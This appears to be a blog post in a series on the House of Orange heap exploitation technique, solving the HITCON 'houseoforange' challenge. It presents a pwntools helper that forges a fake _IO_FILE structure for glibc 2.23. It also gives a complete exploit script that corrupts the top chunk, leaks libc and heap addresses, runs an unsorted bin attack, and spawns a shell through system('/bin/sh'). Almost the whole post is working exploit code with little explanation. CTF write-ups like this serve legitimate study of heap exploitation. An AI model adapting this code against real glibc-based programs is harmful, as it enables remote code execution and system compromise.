2019/09/06 - [heap/house_of_orange] - house_of_orange (4) HITCON house of orange writeup
Last time we wrote a working exploit against the HITCON challenge. Hand-assembling the fake _IO_FILE structure every time is tedious, though, so this time we will write a module that builds the fake structure for us.
Doing so is simple: as covered in the second post, lay the structure out so that it passes the checks, and return it.
2019/09/03 - [heap/house_of_orange] - house_of_orange (2)
```python
from pwn import *   # Python 2 pwntools: str payloads are byte strings

def hog(IO_list, ptr, fun):
    # Fake _IO_FILE written over the old top chunk (glibc 2.23, x86-64).
    # IO_list : address of _IO_list_all
    # ptr     : address where this fake struct starts
    # fun     : address to call via _IO_OVERFLOW (one_gadget or system)
    payload = '/bin/sh\x00'            # _flags (also the argument of system)
    payload += p64(0x61)               # size
    payload += p64(0)                  # fd
    payload += p64(IO_list - 16)       # bk
    payload += p64(2)                  # _IO_write_base
    payload += p64(3)                  # _IO_write_ptr (> _IO_write_base)
    payload += p64(fun)                # one_gadget or system (vtable+0x18 lands here)
    payload = payload.ljust(0xc0, '\x00')
    payload += p64(0)                  # _mode
    payload = payload.ljust(0xd8, '\x00')
    payload += p64(ptr + 24)           # vtable
    return payload
```
To use it, put that file in the same directory as the script that will call the function, then either `import <name of the file containing hog, without .py>` or `from <name of the file containing hog, without .py> import hog`.
With this module, the exploit code from
2019/09/06 - [heap/house_of_orange] - house_of_orange (4) HITCON house of orange writeup
becomes the following:
```python
from pwn import *   # Python 2 pwntools: str payloads are byte strings
from hog import hog

context.log_level = "debug"

def build_house(length, name, price, color):
    p.sendlineafter('Your choice : ', '1')
    p.sendlineafter('Length of name :', str(length))
    p.sendafter('Name :', str(name))
    p.sendlineafter('Price of Orange:', str(price))
    p.sendlineafter('Color of Orange:', str(color))

def see_the_house():
    p.sendlineafter('Your choice : ', '2')

def upgrade_house(length, name, price, color):
    p.sendlineafter('Your choice : ', '3')
    p.sendlineafter('Length of name :', str(length))
    p.sendafter('Name:', str(name))
    p.sendlineafter('Price of Orange:', str(price))
    p.sendlineafter('Color of Orange:', str(color))

p = process('./houseoforange')
e = ELF("./houseoforange")
l = e.libc
pause()

build_house(400, 10, 10, 1)

#### free old top chunk
payload = 'a' * 0x190
payload += p64(0)             ## next chunk : prev_size
payload += p64(33)            ## next chunk : size
payload += p64(0x1f0000000a)  ## next chunk : content
payload += p64(0)             ## next chunk : content
payload += p64(0)             ## top chunk : prev_size
payload += p64(0xe21)         ## top chunk : size
upgrade_house(4000, payload, 10, 1)
build_house(0x1000, 10, 10, 1)  ## call malloc : request > top chunk size
#####################

### LEAK libc using main_arena + 88
build_house(1100, 'LEAK_ADD', 10, 1)
see_the_house()
libc = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 1624 - 16
libc -= l.sym['__malloc_hook']
log.info('libc : ' + hex(libc))
log.info('sys : ' + hex(libc + l.sym['system']))
###########################

### LEAK heap_addr
upgrade_house(1000, 'a' * 16, 10, 1)
see_the_house()
p.recvuntil('a' * 16)
old_top_addr = u64(p.recv(6).ljust(8, '\x00'))
log.info('old_top_addr : ' + hex(old_top_addr))
################

### unsorted bin attack && write fake _IO_FILE
start = old_top_addr + 0x450 + 8 * 6
log.info('fake struct start : ' + hex(start))
payload = 'a' * 0x450
payload += p64(0)             ## next chunk : prev_size
payload += p64(33)            ## next chunk : size
payload += p64(0x1f0000000a)  ## next chunk : content
payload += p64(0)             ## next chunk : content
payload += hog(libc + l.sym['_IO_list_all'], start, libc + l.sym['system'])
upgrade_house(0x1000, payload, 10, 1)
#####################

pause()
p.sendlineafter('Your choice : ', '1')  ## trigger malloc()
p.interactive()
```
This way the code becomes noticeably more concise.